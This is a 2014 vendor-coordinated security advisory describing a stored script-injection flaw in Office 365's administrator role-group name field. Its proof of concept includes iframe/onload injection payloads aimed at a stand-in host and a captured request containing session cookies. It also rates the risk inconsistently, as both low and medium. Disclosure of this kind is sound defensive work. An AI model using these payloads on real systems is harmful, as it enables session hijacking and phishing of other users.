Document Title:
===============
Microsoft Office 365 Outlook - Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=857

Microsoft Security Response Center (MSRC) ID: 14093
Microsoft Security Response Center (MSRC) MANAGER: JT


Release Date:
=============
2014-04-09


Vulnerability Laboratory ID (VL-ID):
====================================
857


Common Vulnerability Scoring System:
====================================
3.3


Product & Service Introduction:
===============================
Microsoft Online Services is Microsoft`s hosted-software offering and a component of their software plus services strategy.
Microsoft Online Services are hosted by Microsoft and sold `with` Microsoft partners. The suite includes Exchange Online, 
SharePoint Online, Office Communications Online, Microsoft Forefront, and Microsoft Office Live Meeting. For businesses, 
the Software-plus-Services approach enables organizations to access the capabilities of enterprise software through on-premises 
servers, as online services, or a combination of both, depending on specific business requirements. Services also provide the 
option to add complementary capabilities that enhance on-premises server software and simplify system management and maintenance.

(Copy of the Vendor Homepage: https://microsoftonline.com )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent POST Inject vulnerability in the official Microsoft (cloud-based) Office 365 Application.


Vulnerability Disclosure Timeline:
==================================
2013-02-03:	Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-02-06:	Vendor Notification (Microsoft Security Response Center Team)
2013-02-07:	Vendor Response/Feedback  (Microsoft Security Response Center Team)
2014-04-11:	Vendor Fix/Patch (Status: by Check)
2014-04-11:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Microsoft Corp.
Product: Office 365 (cloud-based)


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
A persistent POST Inject (input validation) web vulnerability has been discovered in the official Microsoft (cloud-based) Office 365 web-application.
The vulnerability allows remote attackers to inject via POST method request own malicious script codes on application-side (persistent) of the affected service.

The vulnerability is located in the `Rollen & Überwachung - Administrator Rollen` (AdminRoleGroups.svc) function when processing to request via POST method the 
`Name - Gruppen/Rollen` module the connected vulnerable `name` list item context. The persistent injected script code occurs in the name profile listing context. 

The first post method request validates the context of the input and the website process to load the next GET method request for the required context. At least 
the remote attacker is able to change the vulnerable `name` value in the post method request to manipulate the context and bypass the first validation.
The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3(+)|(-)3.4.

Exploitation of the remote web validation vulnerability requires a low privileged application user account and low or medium user interaction.
Successful exploitation of the vulnerability result in persistent session hijacking, persistent phishing, external redirect, external malware loads 
and persistent vulnerable module context manipulation.

Vulnerable Section(s):
[+] Microsoft - Office 365 (cloud-based)

Vulnerable Module(s):
[+] Rollen & Überwachung - Administrator Rollen (EditAdminRoleGroup.aspx & NewAdminRoleGroup.aspx)

Vulnerable Parameter(s):
[+] Name - Gruppen/Rollen

Affected Module(s):
[+] Rollen Gruppe Name - Listing (default.aspx)


Proof of Concept (PoC):
=======================
The persistent POST Inject web vulnerability can be exploited by remote attackers with low privileged application user account and low or medium user interaction. 
For security demonstration or to reproduce the persistent validation web vulnerability follow the provided information and steps below to continue.

Parsed/encoded via Get after the first POST Injection when processing to load standard iframes and script codes

{"properties":{"Name":"<iframe src=evil.source>%20%20%20%20"><iframe src=evil.source
onload=alert("VL") <",
"Description":"<iframe src=a>%20%20%20%20"><iframe src=evil.source
onload=alert("VL") <",
"AggregatedScope":{"IsOrganizationalUnit":false,"ID":"00000000-0000-0000-0000-000000000000"},
"Roles":[{"__type":"Identity:ECP","DisplayName":"ApplicationImpersonation",
"RawIdentity":"7588b7ad-3b24-4a93-a287-bad376d743ae"}],"Members":[]}}


PoC: GET Name Role Listing after the first POST request (validation not recognized) ... (length 337)

Host=amsprd0411.outlook.com
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101
Firefox/17.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
DNT=1
Connection=keep-alive
Content-Type=application/json;
charset=utf-8
Referer=https://amsprd0411.outlook.com/ecp/UsersGroups/NewAdminRoleGroup.aspx?pwmcid=1&ReturnObjectType=1
Content-Length=337
Cookie=msExchEcpCanary=p9hYrv0iBkKgJtsPWhYkKAur8wtDt88I-ItyFMptVGUpXe40kqHlEXj5zyY0GLPRrGOOzZK0EWo.;
exchangecookie=54671c0c87584a3499a18068db557e12;
domainName=remove23.onmicrosoft.com; lastResponse=; MH=MSFT; orgName=remove23.onmicrosoft.com; ASP.NET_SessionId=6b491b36-0b27-4e59-8e0f-67edf80a6836;
TimeOffset=-60;
OutlookSession=3140134384334b7a9946b9f070acf221;
RPSAuth=FAA6ARS6HtG2iyaX4%2BuzBh3jRrt7a/GBDwNmAAAEgAAACLUda28bUw25%2BAAJQ6RD9K1ozBSQHA0XtRSrx3p1zn0Q6hBqzj5L8pKNewkYkgea
S4XuQv9fbEh1LZZrPmnKWyZPBF5RHs6o5qBrdsPIUys8tE9OTrK%2BiGubbOExftEau0%2BRgsbM6yFkbuTD9oiUDLRN1v2o/PXqzn2tZPR1yldoKTk6YTRm
HSSA71e2T6uAzvFOfkfAjOKdZDxjNNSeHtzN8io72X8h823E6LCorbpfRyDNFU1jO9Soy3ff0q9sTMxKt8gSSkt27vuC%2BCXiyGeaA8p23uy2EdHQ%2BSGmo
d9L61lZFIGqNWdYUcwyKw7Cy/MO2N1Otx/5/pz1RROxGDHgtxQADoC%2Bs0vaymvQnwKwUR3IQdJ8GVU%3D;
RPSSecAuth=FAA6ARS6HtG2iyaX4%2BuzBh3j
Rrt7a/GBDwNmAAAEgAAACLeokwIg7TOW%2BACggruuvHuStspjHouyB1Ji87MA83IJLPFERWsPMMXJ1hGcEJmHo/nrUyfxiYKDwPKH2Byu0YLjZcPQcQpZ86vH
mFUOOdGr41Sj8WRtCntSjer4%2BVhyFFPG6Yi/5oTyTS24/do9vvqV73s65dQqrnC3lCPWG9Y76RoaCixIjKUsdJnAGWSkw64CZKR7L5JbKGscy2%2B0pmoHEr
xDgPOE6lJhCKDOciEDyeBbpF54SQxeGf8hYbPa3/dzCmM5GSYY5j6/UWvkpST0Lk9582pV9X7zfsOgJ78IdVcaZITt6KHqyRl%2B4roh1ontdnCgE%2BYr1Sok
2%2BxmhrKdGRQAEmCv2vU6vf10k7tKT3sGc09wAkM%3D;
ecpCookieTest=1
Pragma=no-cache
Cache-Control=no-cache

POSTDATA ={"properties":{"Name":"<[PERSISTENT INJECTED SCRIPT CODE!]<[PERSISTENT INJECTED SCRIPT CODE!]") <", "AggregatedScope":

{"IsOrganizationalUnit":false,"ID":"00000000-0000-0000-0000-000000000000"},
"Roles":[{"__type":"Identity:ECP","DisplayName":"ApplicationImpersonation","RawIdentity":"7588b7ad-3b24-4a93-a287-bad376d743ae"}],"Members":[]}}


Add Mitglieder (Add Members) - Rollengruppe > Rollen und Überwachung > Administratorrollen
https://amsprd0411.outlook.com/ecp/UsersGroups/EditAdminRoleGroup.aspx?pwmcid=3&id=fcc09263-646b-4d95-91d3-80d55a01fc18&ReturnObjectType=1
https://amsprd0411.outlook.com/ecp/UsersGroups/NewAdminRoleGroup.aspx?pwmcid=1&ReturnObjectType=1

Affected Listing (MailOptionen > Meine Organisation verwalten > Meine Organisation): Name
https://amsprd0411.outlook.com/ecp/default.aspx?exsvurl=1&Realm=remove23.onmicrosoft.com


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a parse of the last POST request after the GET with the first requested and inserted context.
The last request need to be recognized by the validation like in the first post request when processing to load and insert via the regular formular.


Security Risk:
==============
The security risk of the persistent input validation vulnerability is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2014 | Vulnerability Laboratory [Evolution Security]